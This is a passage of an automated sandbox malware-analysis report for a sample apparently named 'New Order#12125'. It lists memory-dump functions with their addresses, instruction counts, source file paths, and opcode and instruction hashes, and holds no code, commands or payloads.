                                                                        • Opcode Fuzzy Hash: d0495c80fffb3a9b3b94a0e242a75aa1a1faa7d9f23b96c18e5133a7642dbfd3
                                                                        • Instruction Fuzzy Hash: E331B0322052018FC731DF19D8C0EAAB7E6FB81760F1A446DE996CF256DB30E804DB91
                                                                        Function 01504260 Relevance: .1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4ad58b3b4c62cf3966598d9ab4a3fc28d377d53012e8405dc26978a1872e31c
                                                                        • Instruction ID: 978b16b34ab6f7a5116224a82ef8a05ce165c05fb346d7a5baa1b40ff20763ad
                                                                        • Opcode Fuzzy Hash: b4ad58b3b4c62cf3966598d9ab4a3fc28d377d53012e8405dc26978a1872e31c
                                                                        • Instruction Fuzzy Hash: AE41BF71200B46DFD722DF68C880BDA7BE9BF45714F11882DEA9A8F290D770E844CB90
                                                                        Function 015B4BB0 Relevance: .1, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e9240fce5d886408914fedcea138403088f0aa6865e6e3e5a2e34be5930cc07
                                                                        • Instruction ID: 305916a2528347a8a5602a961b134a949e0620aec60b122ffee3403b38ab8d5e
                                                                        • Opcode Fuzzy Hash: 7e9240fce5d886408914fedcea138403088f0aa6865e6e3e5a2e34be5930cc07
                                                                        • Instruction Fuzzy Hash: B0317E716042018FD734DF28C8C1AAAB7E5FB84B10F16496DE9A6DF296E730E804DB91
                                                                        Function 0157EB1D Relevance: .1, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 90bbd678f75be8b75d087dca9256638b3a67a5dce339d9170394891f4946b8a4
                                                                        • Instruction ID: c419190730418f3b8c16a8a704b1a54dbf4b82a64ea6c09ce4a10ab379a9d465
                                                                        • Opcode Fuzzy Hash: 90bbd678f75be8b75d087dca9256638b3a67a5dce339d9170394891f4946b8a4
                                                                        • Instruction Fuzzy Hash: B231A1713017829BF326576DD95AB297FD9FB81B84F1D00E0AB499F6D1DB28D841C230
                                                                        Function 015C61C3 Relevance: .1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5a48461408a6f5a81f46f080deb8237ee19a7e669f91af01d6dcf91d07b340ad
                                                                        • Instruction ID: 580d017a841059c7b96a260e2f1202af1cdc2c25f16c6392e07ba8baa0b75403
                                                                        • Opcode Fuzzy Hash: 5a48461408a6f5a81f46f080deb8237ee19a7e669f91af01d6dcf91d07b340ad
                                                                        • Instruction Fuzzy Hash: 2631A176A00116AFDB15DF98C840BAEB7B6FB88B44F454169E901AF244D770ED01CBA4
                                                                        Function 015A483A Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ed11684f2f0ea5c5ed6a6bcb3646bd0bc5e3b216716ea8038cc998451891fdba
                                                                        • Instruction ID: 8f8ba3566f8dabc80a2bb070a4f2b3f9ad701d29aeb57c2b7a16fb0d2b532ae8
                                                                        • Opcode Fuzzy Hash: ed11684f2f0ea5c5ed6a6bcb3646bd0bc5e3b216716ea8038cc998451891fdba
                                                                        • Instruction Fuzzy Hash: 50316576A4012DAFCF21DF94DC84BDEBBB5BB98310F1400A5A508AB250DB70DE91CF90
                                                                        Function 0152EB20 Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54f60f2e19cb01844d798aca654413c91590e3ede22cb6d528ba644b6bf02ffe
                                                                        • Instruction ID: ed9864bd56b3535bc0566d98d8c6df53957ce9bb8c8d8acddc543696a0356364
                                                                        • Opcode Fuzzy Hash: 54f60f2e19cb01844d798aca654413c91590e3ede22cb6d528ba644b6bf02ffe
                                                                        • Instruction Fuzzy Hash: CC31D773E00625AFDB21DFA9C840A9EBBF8FF49350F014426E915EF290D2709E008BE0
                                                                        Function 015C6BD7 Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8eb104e6550096174d0a2e2f6250d72d3aec9245f869d39710dc3041a4123b98
                                                                        • Instruction ID: 3a6e3b3e92756fd6595920c9653caf4dc3b8765f37b99a0d2abeca771170a094
                                                                        • Opcode Fuzzy Hash: 8eb104e6550096174d0a2e2f6250d72d3aec9245f869d39710dc3041a4123b98
                                                                        • Instruction Fuzzy Hash: 13316F316002049FCB24CF69D8C5A5B7BE4FF88750F45846DF918DF289D270EA49CBA4
                                                                        Function 015C60B8 Relevance: .1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 41fb751e13842641f100332420b74291a5cda45e0e8c0c27ed83aa0fc0f19faa
                                                                        • Instruction ID: 079f8d94eec4fc50e0fb1ef6479d51fc4913294201b6b34c73e683994b252254
                                                                        • Opcode Fuzzy Hash: 41fb751e13842641f100332420b74291a5cda45e0e8c0c27ed83aa0fc0f19faa
                                                                        • Instruction Fuzzy Hash: 1231C275A40606AFEB129FA9C850A6FB7F9BFC4B54F11006DE505EF342DA70DE018B90
                                                                        Function 015007AF Relevance: .1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f4966245c68262ce4ad4532c6cde94aa568db1f36c8bbb18391081ea2be2463a
                                                                        • Instruction ID: 5f88b54fafdffa6a9c4c92dd39edef6e6cfb3196c7fed6cdd8d77b5d01fffa59
                                                                        • Opcode Fuzzy Hash: f4966245c68262ce4ad4532c6cde94aa568db1f36c8bbb18391081ea2be2463a
                                                                        • Instruction Fuzzy Hash: 2D318132A046129BC713DEA48890A6BBBA5BFD4690F01492DFD55AF2D0DB30DD1187E1
                                                                        Function 01508550 Relevance: .1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a977f97f2d8a2af87c0ff8b4921f75c6e44e956e5e27000427150b5e11aba3e1
                                                                        • Instruction ID: 565d4aac9155d9a84f5f460048f52a849b7fbcedc8118ec05b78c3eb00bc7a49
                                                                        • Opcode Fuzzy Hash: a977f97f2d8a2af87c0ff8b4921f75c6e44e956e5e27000427150b5e11aba3e1
                                                                        • Instruction Fuzzy Hash: 3031AD71A093029FE721CF59C840B2BBBE9FB98710F0549AEE9849B391D771E844CB91
                                                                        Function 0153A6C7 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                        • Instruction ID: 57eea84ece61bccaedcf04162d187d2e2a0cc44cfcfb7dd48cfd7e1bf8d92ef3
                                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                        • Instruction Fuzzy Hash: 163130B2B00B01AFE761CF6DDD81B57BBF8BB88650F04092DA59AC7651E730E900CB50
                                                                        Function 015AEBD0 Relevance: .1, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a57cb585f561d51313d3915fb54880f8a295be0734160842d313ca4e3ca5a36c
                                                                        • Instruction ID: 5d7498ec8039208ba013054bf13e897c5ab49d80222f836a92b4adcacbcc4043
                                                                        • Opcode Fuzzy Hash: a57cb585f561d51313d3915fb54880f8a295be0734160842d313ca4e3ca5a36c
                                                                        • Instruction Fuzzy Hash: 3831AAB1685302CFCB11DF19C59195EBBF1FF89218F8549AEE4889F251E330EA44CB92
                                                                        Function 0152438F Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef07fb50b9500880fe4dc64ca9fabbcf3b4e2f0f13907e989531f0be844c8146
                                                                        • Instruction ID: 96971ddf2cab163e1f1bf51824ac07cebcab096fb457af9ff5e966f311f83cb6
                                                                        • Opcode Fuzzy Hash: ef07fb50b9500880fe4dc64ca9fabbcf3b4e2f0f13907e989531f0be844c8146
                                                                        • Instruction Fuzzy Hash: B531C032B006169FD720EFA8C980A6EBBF9BF95304F008529D156DB694E770ED45CBA0
                                                                        Function 014FCB7E Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                        • Instruction ID: 98e20bc01c954cd648a6c8570833a9a4c487e22a127c8f5c11c61e3f5f9432df
                                                                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                        • Instruction Fuzzy Hash: 7E210936E4025BAAD7119BB98851BAFBBB5BF55740F06813A9E15EB350E270C90087A0
                                                                        Function 014FC156 Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 02415278e28e17b426a25e6d8372744753aa995d741d90e786672c00aeb9adaf
                                                                        • Instruction ID: 02d0db194d43b73451cad305a98c1f21baabac063ac44496f4eabf85e96f2cd9
                                                                        • Opcode Fuzzy Hash: 02415278e28e17b426a25e6d8372744753aa995d741d90e786672c00aeb9adaf
                                                                        • Instruction Fuzzy Hash: 70314D725012028BD771AF58CC90B6D77B4FF90314F54816EDD469F386EA34D986CBA0
                                                                        Function 015BC3CD Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                        • Instruction ID: dce55cfcd97d84dad50ed0eb441d6e8ca59423ea4bbe90f3b643f2b272749b2d
                                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                        • Instruction Fuzzy Hash: 73212D3A60065377CB15AB958840AFABBB4FFD0711F40881AFA558F651E639DA40C364
                                                                        Function 014FE420 Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bcf9291530b48b065f4983e5dedab9a0839f81e497402de900af22fe712d6777
                                                                        • Instruction ID: f55d0a8000e60066303317ebad3a847fa7ac4ad7b6237924c5c4ebe5a0a70f4b
                                                                        • Opcode Fuzzy Hash: bcf9291530b48b065f4983e5dedab9a0839f81e497402de900af22fe712d6777
                                                                        • Instruction Fuzzy Hash: 4731D331A405199BDB319A18CC41BEA77B9AB55740F0201AAE745BB3B0E6749E818F90
                                                                        Function 01534588 Relevance: .1, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                        • Instruction ID: 928da031d9a1d3646903ce89dbe1f06b6ec5ab79d94f49a68ab8156771bb4507
                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                        • Instruction Fuzzy Hash: A2218335A00649EFCB15CF58C980A8EBBF5FF88714F1080A9EE159F241D671EE05DB90
                                                                        Function 015344B0 Relevance: .1, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54eeed24e57af9f1ebcfd8052f0c229df74b01567e38c1c285220b8609ae7142
                                                                        • Instruction ID: 2eef26d513838f9a423c7fdbe8c9bec19b12d0e21d80376d5a9f365b19e321ed
                                                                        • Opcode Fuzzy Hash: 54eeed24e57af9f1ebcfd8052f0c229df74b01567e38c1c285220b8609ae7142
                                                                        • Instruction Fuzzy Hash: BC218F72A047569BCB22DF18C880B6B7BE4FBC8760F054919F955AF681D730E9018BA2
                                                                        Function 015D03E6 Relevance: .1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 053085cced715201d1777f7aecc6d311713ca444610b52c2a9240723fd8e1ec5
                                                                        • Instruction ID: 0d7d7f111c67d33121966502d9a3ddd1f85420bbc14accc889d88448d3dcc4a3
                                                                        • Opcode Fuzzy Hash: 053085cced715201d1777f7aecc6d311713ca444610b52c2a9240723fd8e1ec5
                                                                        • Instruction Fuzzy Hash: D5313071A00119ABCF14DBA8D894E9FBBB9FB88214F41412DF915EB240DA70AE44CBA0
                                                                        Function 014FE388 Relevance: .1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                        • Instruction ID: bed7a69d32f8015a4ccc867e61c2bbc9f52316bdb8c8bbeffe3786289eace6d0
                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                        • Instruction Fuzzy Hash: DA318A31600605AFE721CF68C884F6AB7B9FF85354F1145AAE6129B3A1E730EE02CB50
                                                                        Function 0157E609 Relevance: .1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ca2018946f7c8f52e09e39cc005437c594ec6595301bb8504e933616792f9ccf
                                                                        • Instruction ID: cae0e0d5e70aac4829ff7d07a8b659cd3a6de811a5a6432af3aa3faf60451ea4
                                                                        • Opcode Fuzzy Hash: ca2018946f7c8f52e09e39cc005437c594ec6595301bb8504e933616792f9ccf
                                                                        • Instruction Fuzzy Hash: 71317F75600216DFCB14DF5CE8869AEB7F6FF84304B154499E8099F391E771EA50CB90
                                                                        Function 015D0591 Relevance: .1, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8dd8438090b11bee37d88325d16f277d1f641360e347c2e0d9b1b0e865414bdc
                                                                        • Instruction ID: d729fb86a89fd568e7850f89eb0332c607587d2b66deb9585536b8faf5b11a18
                                                                        • Opcode Fuzzy Hash: 8dd8438090b11bee37d88325d16f277d1f641360e347c2e0d9b1b0e865414bdc
                                                                        • Instruction Fuzzy Hash: A2217E326102058FDB38CE2DD8806AAB7A2FBD5310FA54878ED15DF2C5D775E855C790
                                                                        Function 015806F1 Relevance: .1, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 099499c9bd258d56feb0aed5a29af4e0fce8da53658b3bb9e9adfe80baad4b26
                                                                        • Instruction ID: c34be488f03d65a70f8198a02441c1decd10dcc3ee238d3cc2f8ef51856e0958
                                                                        • Opcode Fuzzy Hash: 099499c9bd258d56feb0aed5a29af4e0fce8da53658b3bb9e9adfe80baad4b26
                                                                        • Instruction Fuzzy Hash: 4721A07190012A9BDF11EF59C881ABEB7F4FF48740B510069F541FB290E738AD41CBA0
                                                                        Function 0158019F Relevance: .1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ca01925e73332b390880332bdd699f11612148728242e7b1154a19095e88e17
                                                                        • Instruction ID: f24413b2be3d74dfc46258f6a3ef190268368a1430dd5bf295dddfba75484ad9
                                                                        • Opcode Fuzzy Hash: 4ca01925e73332b390880332bdd699f11612148728242e7b1154a19095e88e17
                                                                        • Instruction Fuzzy Hash: F921A171600645AFD715EB6CD840F69B7B8FF88754F140169F905EB690E734ED40CB94
                                                                        Function 01580283 Relevance: .1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd2f2e5b7c4457ecf239d87a43881ab4c1799b0b2360d34f4c5c92971d66b118
                                                                        • Instruction ID: 6a3e5071c363328eb3fe0ea4d5ede8a5b6e2a986bba8ae4a4684a841232de22b
                                                                        • Opcode Fuzzy Hash: dd2f2e5b7c4457ecf239d87a43881ab4c1799b0b2360d34f4c5c92971d66b118
                                                                        • Instruction Fuzzy Hash: C621C1725042469BE711FF59C844B5FBBDCBFD1250F080456B9809F291DB30C908C6A1
                                                                        Function 01522835 Relevance: .1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: db4ac56b1e28559d3bd4828e6b7be188342e192c715d566574cf22eff13b0f13
                                                                        • Instruction ID: e290e44e8c3161f66395d87c18ade85fdeef5596e4a22ebd7395d7d2f9eb2703
                                                                        • Opcode Fuzzy Hash: db4ac56b1e28559d3bd4828e6b7be188342e192c715d566574cf22eff13b0f13
                                                                        • Instruction Fuzzy Hash: 3821F9367057929BF323576C8C14B297BD9BF82B74F190364FA20AF6D2DBA8C801C250
                                                                        Function 015D01AA Relevance: .1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 660a90b3d0def0bd1da674303e85a82717a4626eccac1ad77680c5954ce75de1
                                                                        • Instruction ID: 12637b0b8ecfc0234053efefd20f322bc83a160bcae9749d4c888cbab8613d89
                                                                        • Opcode Fuzzy Hash: 660a90b3d0def0bd1da674303e85a82717a4626eccac1ad77680c5954ce75de1
                                                                        • Instruction Fuzzy Hash: C421E4612042506FDB05CF1A88B44B6BFE5EFC7125B0A81FAE884CF7A3C524D81AC7A0
                                                                        Function 0153A30B Relevance: .1, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7099675976c93c6de7b11645f35d3340047c07497632f928c755460cac930c08
                                                                        • Instruction ID: baf2c2199deb5be76bddbefa114adcc9d26cd6395c09b99f55df9940e31c9a3b
                                                                        • Opcode Fuzzy Hash: 7099675976c93c6de7b11645f35d3340047c07497632f928c755460cac930c08
                                                                        • Instruction Fuzzy Hash: AF217979211A029FD725DF29C901B56B7F5BF88B08F24846CA549CFB61E371E842CB94
                                                                        Function 015BA49A Relevance: .1, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d7d3be6285c6692efe16cae139245712d6b369b38a2273bbf4d5785117df6b84
                                                                        • Instruction ID: 00e1d8e8ec8fabe32bc41159088b1a0a8e4d3f0cc31c8836b37592e0f47f5fff
                                                                        • Opcode Fuzzy Hash: d7d3be6285c6692efe16cae139245712d6b369b38a2273bbf4d5785117df6b84
                                                                        • Instruction Fuzzy Hash: 2D110A72340A127FEB225655AC81FAB76D9FBD4B60F510428B719CF1D0EB70DD0187A5
                                                                        Function 01580946 Relevance: .1, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d27c7c7ede4ae8a1c3676c82c1e332085c830f2ae0910a2044d8f46da31dcac
                                                                        • Instruction ID: 631fce26fce57be0bccbf50e78b62940500bfc0bd7e83399b1c7564b5588b9c6
                                                                        • Opcode Fuzzy Hash: 9d27c7c7ede4ae8a1c3676c82c1e332085c830f2ae0910a2044d8f46da31dcac
                                                                        • Instruction Fuzzy Hash: 0321E5B1E40209ABDB20DFAAD8809AEFBF8FF98610F10012FE515EB290D7709945CB54
